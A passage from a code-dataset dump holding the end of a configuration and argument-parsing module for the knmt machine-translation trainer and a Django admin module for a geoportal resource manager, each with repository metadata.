training_paramenters_group.add_argument(\"--use_previous_prediction\", default=0, type=float)\n training_paramenters_group.add_argument(\"--curiculum_training\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--reverse_src\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--reverse_tgt\", default=False, action=\"store_true\")\n \n training_paramenters_group.add_argument(\"--use_soft_prediction_feedback\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--use_gumbel_for_soft_predictions\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--temperature_for_soft_predictions\", type=float, default=1.0)\n\n\n training_paramenters_group.add_argument(\"--dynamic_batching\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--dynamic_batching_max_elems\", type=int, default=10000)\n training_paramenters_group.add_argument(\"--dynamic_batching_nb_sent_to_sort\", type=int, default=5000)\n \n training_paramenters_group.add_argument(\"--load_initial_source_embeddings\")\n training_paramenters_group.add_argument(\"--load_initial_target_embeddings\")\n\n training_monitoring_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"training_management\"])\n training_monitoring_group.add_argument(\"--config\", help=\"load a training config file\")\n training_monitoring_group.add_argument(\"--data_prefix\", dest=\"data_prefix\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"same as positional argument --data_prefix\")\n training_monitoring_group.add_argument(\"--save_prefix\", dest=\"save_prefix\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"same as positional argument --save_prefix\")\n training_monitoring_group.add_argument(\"--gpu\", type=int, help=\"specify gpu number to use, if any\")\n training_monitoring_group.add_argument(\"--load_model\", help=\"load the parameters of a previously trained model\")\n training_monitoring_group.add_argument(\"--load_optimizer_state\", help=\"load previously saved optimizer states\")\n training_monitoring_group.add_argument(\"--load_trainer_snapshot\", help=\"load previously saved trainer states\")\n training_monitoring_group.add_argument(\"--use_memory_optimization\", default=False, action=\"store_true\",\n help=\"Experimental option that could strongly reduce memory used.\")\n training_monitoring_group.add_argument(\"--max_nb_iters\", type=int, default=None, help=\"maximum number of iterations\")\n training_monitoring_group.add_argument(\"--max_nb_epochs\", type=int, default=None, help=\"maximum number of epochs\")\n training_monitoring_group.add_argument(\"--max_src_tgt_length\", type=int, help=\"Limit length of training sentences\")\n training_monitoring_group.add_argument(\"--report_every\", type=int, default=200, help=\"report every x iterations\")\n training_monitoring_group.add_argument(\"--no_resume\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--no_report_or_save\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--sample_every\", default=200, type=int)\n training_monitoring_group.add_argument(\"--save_ckpt_every\", default=4000, type=int)\n training_monitoring_group.add_argument(\"--save_initial_model_to\", help=\"save the initial model parameters to given file in npz format\")\n training_monitoring_group.add_argument(\"--reshuffle_every_epoch\", default=False, action=\"store_true\", help=\"reshuffle training data at the end of each epoch\")\n training_monitoring_group.add_argument(\"--resume\", default=False, action=\"store_true\", help=\"resume training from checkpoint config\")\n training_monitoring_group.add_argument(\"--timer_hook\", default=False, action=\"store_true\", help=\"activate timer hook for profiling\")\n training_monitoring_group.add_argument(\"--force_overwrite\", default=False, action=\"store_true\", help=\"Do not ask before overwiting existing files\")\n training_monitoring_group.add_argument(\"--description\", help=\"Optional message to be stored in the configuration file\")\n\n training_monitoring_group.add_argument(\"--set_false_in_config\", nargs=\"*\", help=\"Forcing some options to be false\")\n \n training_monitoring_group.add_argument(\"--update_old_config_file_with_default_values\", \n default=False, action=\"store_true\", help=\"When using older config files\")\n\n training_monitoring_group.add_argument(\"--generate_computation_graph\", help=\"will generate computation graph of the first loss computed\")\n\n training_monitoring_group.add_argument(\"--disable_cudnn_softmax\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--use_chainerx\", default=False, action=\"store_true\", help=\"use chainerx\")\n\nclass CommandLineValuesException(Exception):\n pass\n\n#\n# def load_training_config_file(filename):\n# file_content = json.load(open(filename))\n\n\ndef get_parse_option_orderer():\n description_to_config_section = dict((v, k) for (k, v) in six.iteritems(_CONFIG_SECTION_TO_DESCRIPTION))\n por = argument_parsing_tools.ParseOptionRecorder(group_title_to_section=description_to_config_section,\n ignore_positional_arguments=set([\"save_prefix\", \"data_prefix\"]))\n define_parser(por)\n return por\n\n\ndef convert_cell_string(config_training, no_error=False):\n import nmt_chainer.models.rnn_cells_config\n\n try:\n if \"encoder_cell_type\" in config_training[\"model\"] and config_training[\"model\"][\"encoder_cell_type\"] is not None:\n config_training[\"model\"][\"encoder_cell_type\"] = nmt_chainer.models.rnn_cells_config.create_cell_config_from_string(\n config_training[\"model\"][\"encoder_cell_type\"])\n\n if \"decoder_cell_type\" in config_training[\"model\"] and config_training[\"model\"][\"decoder_cell_type\"] is not None:\n config_training[\"model\"][\"decoder_cell_type\"] = nmt_chainer.models.rnn_cells_config.create_cell_config_from_string(\n config_training[\"model\"][\"decoder_cell_type\"])\n except BaseException:\n if not no_error:\n raise\n\n\ndef load_config_train(filename, readonly=True, no_error=False):\n config = argument_parsing_tools.OrderedNamespace.load_from(filename)\n if \"metadata\" not in config: # older config file\n parse_option_orderer = get_parse_option_orderer()\n config_training = parse_option_orderer.convert_args_to_ordered_dict(config[\"command_line\"], args_is_namespace=False)\n\n convert_cell_string(config_training, no_error=no_error)\n\n assert \"data\" not in config_training\n config_training[\"data\"] = argument_parsing_tools.OrderedNamespace()\n config_training[\"data\"][\"data_fn\"] = config[\"data\"]\n config_training[\"data\"][\"Vi\"] = config[\"Vi\"]\n config_training[\"data\"][\"Vo\"] = config[\"Vo\"]\n config_training[\"data\"][\"voc\"] = config[\"voc\"]\n\n assert \"metadata\" not in config_training\n config_training[\"metadata\"] = argument_parsing_tools.OrderedNamespace()\n config_training[\"metadata\"][\"config_version_num\"] = 0.9\n config_training[\"metadata\"][\"command_line\"] = None\n config_training[\"metadata\"][\"knmt_version\"] = None\n config = config_training\n elif config[\"metadata\"][\"config_version_num\"] != 1.0:\n raise ValueError(\"The config version of %s is not supported by this version of the program\" % filename)\n\n # Compatibility with intermediate verions of config file\n if \"data_prefix\" in config and \"data_prefix\" not in config[\"training_management\"]:\n config[\"training_management\"][\"data_prefix\"] = config[\"data_prefix\"]\n del config[\"data_prefix\"]\n\n if \"train_prefix\" in config and \"train_prefix\" not in config[\"training_management\"]:\n config[\"training_management\"][\"train_prefix\"] = config[\"train_prefix\"]\n del config[\"train_prefix\"]\n\n if readonly:\n config.set_readonly()\n return config\n\n\ndef find_which_command_line_arguments_were_given(argument_list):\n pwndan = argument_parsing_tools.ParserWithNoneDefaultAndNoGroup()\n define_parser(pwndan)\n args_given_set = pwndan.get_args_given(argument_list)\n return args_given_set\n\n\ndef make_config_from_args(args, readonly=True):\n config_base = None\n if args.config is not None:\n log.info(\"loading training config file %s\", args.config)\n config_base = load_config_train(args.config, readonly=False)\n\n if args.set_false_in_config is not None:\n for option_name in args.set_false_in_config:\n path_option = option_name.split(\".\")\n last_dict = config_base\n for level in six.moves.range(len(path_option) -1):\n last_dict = config_base[path_option[level]]\n last_dict[path_option[-1]] = False\n \n\n parse_option_orderer = get_parse_option_orderer()\n config_training = parse_option_orderer.convert_args_to_ordered_dict(args)\n\n convert_cell_string(config_training)\n\n if config_base is not None:\n args_given_set = find_which_command_line_arguments_were_given(\n args.__original_argument_list)\n for argname in set(args_given_set):\n if getattr(args, argname) is None:\n args_given_set.remove(argname)\n\n print(\"args_given_set\", args_given_set)\n config_base.update_recursive(config_training, valid_keys=args_given_set, add_absent_keys=args.update_old_config_file_with_default_values)\n config_training = config_base\n else:\n assert \"data\" not in config_training\n assert \"metadata\" not in config_training\n\n# config_data_fn = config_training[\"data_prefix\"] + \".data.config\"\n\n if config_training[\"training_management\"][\"data_prefix\"] is None or config_training[\"training_management\"][\"save_prefix\"] is None:\n raise CommandLineValuesException(\"save_prefix and data_prefix need to be set either on the command line or in a config file\")\n\n config_training.add_metadata_infos(version_num=1, overwrite=args.config is not None)\n\n if readonly:\n config_training.set_readonly()\n\n return config_training\n\n\n# def load_config_train(filename, readonly = True):\n# config_as_ordered_dict = json.load(open(filename), object_pairs_hook=OrderedDict)\n#\n# config = OrderedNamespace.load_from(filename)\n# if \"metadata\" not in config_as_ordered_dict: # older config file\n# parse_option_orderer = get_parse_option_orderer()\n# config_training = parse_option_orderer.convert_args_to_ordered_dict(config_as_ordered_dict[\"command_line\"], args_is_namespace = False)\n#\n# assert \"data\" not in config_training\n# config_training[\"data\"] = argument_parsing_tools.OrderedNamespace()\n# config_training[\"data\"][\"data_fn\"] = config_as_ordered_dict[\"data\"]\n# config_training[\"data\"][\"Vi\"] = config_as_ordered_dict[\"Vi\"]\n# config_training[\"data\"][\"Vo\"] = config_as_ordered_dict[\"Vo\"]\n# config_training[\"data\"][\"voc\"] = config_as_ordered_dict[\"voc\"]\n#\n# assert \"metadata\" not in config_training\n# config_training[\"metadata\"] = argument_parsing_tools.OrderedNamespace()\n# config_training[\"metadata\"][\"config_version_num\"] = 0.9\n# config_training[\"metadata\"][\"command_line\"] = None\n# config_training[\"metadata\"][\"knmt_version\"] = None\n# elif config_as_ordered_dict[\"metadata\"][\"config_version_num\"] == 1.0:\n# argument_parsing_tools.OrderedNamespace.convert_to_ordered_namespace(config_as_ordered_dict)\n# config_training = config_as_ordered_dict\n# else:\n# raise ValueError(\"The config version of %s is not supported by this version of the program\" % filename)\n#\n# if readonly:\n# config_training.set_readonly()\n# return config_training\n\ndef command_line(arguments=None):\n import argparse\n parser = argparse.ArgumentParser(description=\"Train a RNNSearch model\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n define_parser(parser)\n args = parser.parse_args(args=arguments)\n\n do_train(args)\n\n\ndef do_train(args):\n import nmt_chainer.training_module.train\n config = make_config_from_args(args, readonly=False)\n nmt_chainer.training_module.train.do_train(config)\n\n\nif __name__ == '__main__':\n command_line()\n", "repo_name": "fabiencro/knmt", "sub_path": "nmt_chainer/training_module/train_config.py", "file_name": "train_config.py", "file_ext": "py", "file_size_in_byte": 18496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 21, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 24, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 24, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 91, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 91, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 94, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 136, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ParseOptionRecorder", "line_number": 137, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 137, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.models.rnn_cells_config.create_cell_config_from_string", "line_number": 148, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.models", "line_number": 148, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 148, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.models.rnn_cells_config.create_cell_config_from_string", "line_number": 152, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.models", "line_number": 152, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 152, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace.load_from", "line_number": 160, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 160, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 160, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 168, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 168, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 175, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 175, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ParserWithNoneDefaultAndNoGroup", "line_number": 198, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 198, "usage_type": "name"}, {"api_name": "six.moves.range", "line_number": 214, "usage_type": "call"}, {"api_name": "six.moves", "line_number": 214, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 283, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 284, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.training_module.train.do_train", "line_number": 295, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.training_module", "line_number": 295, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 295, "usage_type": "name"}]} +{"seq_id": "39872997272", "text": "from django.contrib import admin\nfrom django.contrib.gis.admin import OSMGeoAdmin\n\n\nfrom django.views.decorators.cache import never_cache\nfrom django.contrib.admin import SimpleListFilter\nfrom .models import Resource,End_Point,Publisher,Tag,URL,Status_Log,Owner,Type,Geometry_Type,Format,Place,Named_Place, Category,Category_Keywords,Change_Log,Community_Input, Georeference_Request,URL_Type,URL\n\nfrom django.utils.safestring import mark_safe\n\nimport json\nfrom pygments import highlight\nfrom pygments.lexers import JsonLexer\nfrom pygments.formatters import HtmlFormatter\nfrom django.db import connection\n\nfrom django.contrib import messages\nfrom django.utils.translation import ngettext\n\nfrom django.http import HttpResponseRedirect\nimport resources.ingester.Delete_From_Solr as Delete_From_Solr\nimport resources.ingester.DB_ToGBL as db_to_gbl\nimport resources.ingester.Publish_ToGBL as publish_to_gbl\nfrom django.shortcuts import render\n\nimport decimal\nfrom django.contrib.gis.geos import Point, WKTWriter\nfrom django.contrib.gis.geos import GEOSGeometry\n\nimport os\nimport glob\nimport sys\nsys.setrecursionlimit(10000)\n\n# # Register the models\n# class MyModelAdmin(admin.ModelAdmin):\n# list_display = ('id', 'description')\n\nclass MyAdminSite(admin.AdminSite):\n # @never_cache\n site_header = 'Geoportal Administration'\n\nadmin_site = MyAdminSite(name='myadmin')\n\n\n# allow folder editing within the node interface\nclass URLInline(admin.StackedInline):\n model = URL\n list_display = ('url', 'url_type', 'url_label', 'get_link', )\n\n\n fieldsets = [\n (None, {'fields': [('url','get_link')]}),\n (None, {'fields': [('url_type','url_label')]}),\n (None, {'fields': [('geo_reference')]}),\n ]\n readonly_fields = [\"get_link\",\"geo_reference\"]\n\n extra = 0\n\n def get_link(self, obj):\n if obj.pk:\n html = \"Go\"\n return mark_safe(html)\n else:\n return '-'\n\n get_link.short_description = (\"Link\")\n get_link.allow_tags = True\n\n def geo_reference(self, obj):\n if obj.pk and str(obj.url_type)=='image':\n corners=\"\"\n if obj.resource.bounding_box:\n points = []\n for b in obj.resource.bounding_box:\n for p in b:\n points.append(str(p[0]) + \" \" + str(p[1]))\n corners = \"&d=\"+','.join(points)\n solr_id=str(obj.resource.resource_id)+\"-\"+str(obj.resource.end_point.id)\n html = \"Open Georeferencer\"\n return mark_safe(html)\n else:\n return '-'\n\n geo_reference.short_description = (\"Geo Reference\")\n geo_reference.allow_tags = True\n\n\nclass Status_LogInline(admin.StackedInline):\n model = Status_Log\n extra = 0\n\nclass Change_LogInline(admin.StackedInline):\n model = Change_Log\n classes = ['collapse']\n # readonly_fields = ('field_name', \"date_\", \"change_type\")\n fieldsets = [\n (None, {'fields': [('field_name', \"date\", \"change_type\")]}),\n (None, {'fields': ['new']}),\n (None, {'fields': ['old']}),\n (None, {'fields': ['community_input']})\n\n ]\n extra = 0\n\nclass ParentInline(admin.StackedInline):\n model = Resource.parent.through\n fk_name = \"from_resource\" # not work \"parent_resource\" \"resource_id\", \"parent_id\", from_resource_id, to_resource_id\n classes = ['collapse']\n verbose_name = \"Parent Resource\"\n verbose_name_plural = \"Parent Resources\"\n extra = 0\n show_change_link=True\n\nclass ChildrenInline(admin.StackedInline):\n model = Resource.parent.through\n fk_name = \"to_resource\" # not work \"parent_resource\" \"resource_id\", \"parent_id\", from_resource_id, to_resource_id\n classes = ['collapse']\n verbose_name = \"Child Resource\"\n verbose_name_plural = \"Child Resources\"\n extra = 0\n show_change_link=True\n\nclass ParentFilter(admin.SimpleListFilter):\n title = 'Root Resource'\n parameter_name = 'is_parent'\n\n def lookups(self, request, model_admin):\n return (\n ('Yes', 'Yes'),\n ('No', 'No'),\n )\n\n def queryset(self, request, queryset):\n value = self.value()\n if value == 'Yes':\n return queryset.filter(parent=None)\n elif value == 'No':\n return queryset.exclude(parent=None)\n return queryset\n\n# @admin.register(Resource)\nclass ResourceAdmin(OSMGeoAdmin):\n list_filter = ('end_point',\"type\",\"status_type\",\"owner\",ParentFilter,\"missing\")\n search_fields = ('title','alt_title','description','resource_id',)\n list_display = ('title', 'year','end_point','get_thumb_small','type','get_category','status_type',\"child_count\",\"accessioned\")\n\n readonly_fields = ('get_thumb',\"_layer_json\",\"_raw_json\",\"get_tags\",\"get_named_places\",\"get_category\",\"child_count\",\"preview\")\n\n autocomplete_fields =(\"tag\",\"named_place\",\"owner\", \"publisher\")\n fieldsets = [\n (None, {'fields': [('resource_id','preview'),'year','temporal_coverage']}),\n (None, {'fields': [('title', 'alt_title')]}),\n (None, {'fields': ['status_type','end_point',\"missing\"]}),\n (None, {'fields': [('resource_type')]}),\n (None, {'fields': [('type', 'geometry_type', \"format\")]}),\n\n (None, {'fields': [\"get_thumb\", \"thumbnail\"]}),\n (None, {'fields': [(\"owner\", \"publisher\")]}),\n (None, {'fields': [(\"created\",\"modified\",\"accessioned\")]}),\n\n (None, {'fields': ['description']}),\n (None, {'fields': ['bounding_box']}),\n\n (None, {'fields': [\"languages\",\"category\"]}),\n (None, {'fields': [( \"get_tags\",\"tag\")]}),\n (None, {'fields': [(\"get_named_places\",\"named_place\")]}),\n\n\n (None, {'fields': [\"_raw_json\"]}),\n (None, {'fields': [\"_layer_json\"]}),\n (None, {'fields': [\"license_info\"]}),\n\n ]\n\n def child_count(self, obj=None):\n with connection.cursor() as cursor:\n cursor.execute(\"Select count(id) from resources_resource_parent where to_resource_id={};\".format(obj.id))\n\n return (cursor.fetchone()[0])\n\n\n\n def get_tags(self, obj=None):\n print(obj.tag.all())\n return \", \".join([t.name for t in obj.tag.all()])\n\n def get_named_places(self, obj=None):\n return \", \".join([p.name for p in obj.named_place.all()])\n\n def get_category(self, obj):\n return \",\".join([p.name for p in obj.category.all()])\n\n def get_thumb(self, obj=None):\n html = ''.format(obj.thumbnail) if obj.thumbnail else \"\"\n return mark_safe(html)\n\n def get_thumb_small(self, obj=None):\n\n html = ''.format(obj.thumbnail) if obj.thumbnail else \"\"\n return mark_safe(html)\n\n def _raw_json(self, obj=None):\n return mark_safe(get_pretty_json(obj.raw_json)) if obj.raw_json else \"\"\n\n def _layer_json(self, obj=None):\n return mark_safe(get_pretty_json(obj.layer_json)) if obj.layer_json else \"\"\n\n inlines = [\n ParentInline,\n ChildrenInline,\n URLInline,\n Status_LogInline,\n Change_LogInline\n ]\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n actions = [\"add_selected_resources_to_staging\",\"delete_selected_resources\", 'remove_selected_resources_from_index_staging']\n\n def add_selected_resources_to_staging(self, request, queryset):\n # first export\n\n directory = os.path.dirname(os.path.realpath(__file__)) + \"/ingester\"\n verbosity=1\n # clear the directory\n if os.path.exists(directory + \"/json\"):\n files = glob.glob(directory + \"/json/*\")\n if (verbosity>1):\n print(\"removing existing files from past ingest for a fresh start!\")\n\n for f in files:\n os.remove(f)\n\n #if a child is selected we should ingest the parent instead\n for r in queryset:\n # todo - need a better way than just relying upon the parent status\n r.layers = Resource.objects.filter(status_type=r.status_type, parent=r.id)\n print(\"The layers are:\", r.layers)\n # return\n # associate the children\n for r in queryset:\n #todo - need a better way than just relying upon the parent status\n r.layers = Resource.objects.filter(status_type=r.status_type,parent=r.id)\n print(\"The layers are:\",r.layers)\n\n exporter = db_to_gbl.DB_ToGBL({\n \"resources\": queryset,\n \"path\": directory + \"/\",\n \"verbosity\": verbosity\n })\n # then ingest\n publish_to_gbl.Publish_ToGBL({\n \"path\": directory + \"/json\",\n \"verbosity\": verbosity\n })\n # set status to remove from staging\n updated =queryset.update(status_type='is')\n self.message_user(request, ngettext(\n '%d resource was successfully ingested to Staging.',\n '%d resources were successfully ingested to Staging.',\n updated,\n ) % updated, messages.SUCCESS)\n\n add_selected_resources_to_staging.short_description = \"Ingest to Staging\"\n\n def remove_selected_resources_from_index_staging(self, request, queryset):\n deleter = Delete_From_Solr.Delete_From_Solr({})\n # set status to remove from staging\n updated =queryset.update(status_type='rs')\n for obj in queryset:\n # remove from solr\n print(\"DELETE---\", obj.resource_id+\"-\"+str(obj.end_point.id))\n deleter.interface.delete_one_record(\"\\\"\"+obj.resource_id+\"-\"+str(obj.end_point.id)+\"\\\"\")\n\n self.message_user(request, ngettext(\n '%d resource was successfully removed from Staging.',\n '%d resources were successfully removed from Staging.',\n updated,\n ) % updated, messages.SUCCESS)\n\n remove_selected_resources_from_index_staging.short_description = \"Remove from Staging\"\n\n def delete_selected_resources(self, request, queryset):\n\n if 'apply' in request.POST:\n # The user clicked submit on the intermediate form.\n # Perform our update action:\n # # prevent postgres from hanging - https://stackoverflow.com/questions/62439261/postgres-delete-hangs-on-a-table-with-a-self-referential-foreign-key\n with connection.cursor() as cursor:\n cursor.execute(\"ALTER TABLE resources_resource DISABLE TRIGGER ALL;\")\n\n for obj in queryset:\n print(\"WERE DELETING SOMETHING #############\")\n obj.delete()\n\n with connection.cursor() as cursor:\n cursor.execute(\"ALTER TABLE resources_resource ENABLE TRIGGER ALL;\")\n # Redirect to our admin view after our update has\n # completed with a nice little info message saying\n # our models have been updated:\n self.message_user(request,\n \" {} Resources Deleted!\".format(queryset.count()))\n return HttpResponseRedirect(request.get_full_path())\n\n return render(request,\n 'admin/delete.html',\n context={'resources':queryset})\n\n def save_model(self, request, obj, form, change):\n\n try:\n # attempt to match precision and prevent unexpected change\n # use first point as determinant\n #todo make this more robust\n first_point = str(self.model.objects.get(id=obj.id).bounding_box[0][0][0])\n precision = len(first_point[first_point.index(\".\") + 1:])\n wkt_w = WKTWriter()\n wkt_w.precision = precision\n obj.bounding_box = GEOSGeometry(wkt_w.write(obj.bounding_box))\n except:\n pass\n print(\"first point\",)\n \"\"\"pass request to save to distinguish between automation and admin\n \"\"\"\n try:\n obj.save(request.user)\n except:\n pass\n\n def preview(self, obj):\n if obj.pk:\n\n html = \"Preview\"\n return mark_safe(html)\n else:\n return '-'\n\n preview.short_description = (\"Preview\")\n preview.allow_tags = True\n\n\n\ndef get_pretty_json(_json):\n \"\"\"Function to display pretty version of our data REF: https://www.pydanny.com/pretty-formatting-json-django-admin.html\"\"\"\n # Convert the data to sorted, indented JSON\n response = json.dumps(_json, sort_keys=True, indent=2)\n\n # Get the Pygments formatter\n formatter = HtmlFormatter(style='colorful')\n # Highlight the data\n response = highlight(response, JsonLexer(), formatter)\n\n # Get the stylesheet\n return \"\" + response+\"\"\n\n\nadmin_site.register(Resource, ResourceAdmin)\n\nclass End_PointAdmin(OSMGeoAdmin):\n pass\n\nadmin_site.register(End_Point, End_PointAdmin)\n\nclass PublisherAdmin(OSMGeoAdmin):\n search_fields = ('name',)\n pass\nadmin_site.register(Publisher, PublisherAdmin)\n\nclass Community_InputAdmin(OSMGeoAdmin):\n list_display = [\"resource\",\"date\",\"name\", \"email\"]\n raw_id_fields = (\"resource\",)\nadmin_site.register(Community_Input, Community_InputAdmin)\n\nclass Georeference_RequestAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Georeference_Request, Georeference_RequestAdmin)\n\n\nclass OwnerAdmin(OSMGeoAdmin):\n # enable a full_name overwrite when available\n list_display=[\"name\",\"full_name\"]\n search_fields = (\"name\",\"full_name\")\n\nadmin_site.register(Owner, OwnerAdmin)\n\nclass TypeAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Type, TypeAdmin)\n\nclass Geometry_TypeAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Geometry_Type, Geometry_TypeAdmin)\n\nclass FormatAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Format, FormatAdmin)\n\n\nclass Category_KeywordsInline(admin.StackedInline):\n model = Category_Keywords.category.through\n extra = 0\n\nclass Category_KeywordsAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Category_Keywords, Category_KeywordsAdmin)\n\nclass CategoryAdmin(OSMGeoAdmin):\n inlines = [\n Category_KeywordsInline\n ]\nadmin_site.register(Category, CategoryAdmin)\n\n\nclass TagAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Tag, TagAdmin)\n\nclass PlaceAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Place, PlaceAdmin)\n\nclass Named_PlaceAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Named_Place, Named_PlaceAdmin)\n\nclass URL_TypeAdmin(OSMGeoAdmin):\n list_display = ('name', 'ref', 'service', '_class', '_method')\n\nadmin_site.register(URL_Type,URL_TypeAdmin)\n\nclass URLAdmin(OSMGeoAdmin):\n list_filter = (\"url_type\",)\n\nadmin_site.register(URL,URLAdmin)\n\n", "repo_name": "GeospatialCentroid/geoportal-manager", "sub_path": "resources/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 15060, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.admin.AdminSite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 47, "usage_type": "name"}, {"api_name": "models.URL", "line_number": 48, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Status_Log", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 94, "usage_type": "name"}, {"api_name": "models.Change_Log", "line_number": 95, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 107, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Resource.parent", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 108, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 116, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Resource.parent", "line_number": 117, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 117, "usage_type": "name"}, {"api_name": "django.contrib.admin.SimpleListFilter", "line_number": 125, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 125, "usage_type": "name"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 144, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 178, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 178, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 197, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 202, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 233, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 238, "usage_type": "call"}, {"api_name": "models.Resource.objects.filter", "line_number": 243, "usage_type": "call"}, {"api_name": "models.Resource.objects", "line_number": 243, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 243, "usage_type": "name"}, {"api_name": "models.Resource.objects.filter", "line_number": 249, "usage_type": "call"}, {"api_name": "models.Resource.objects", "line_number": 249, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 249, "usage_type": "name"}, {"api_name": 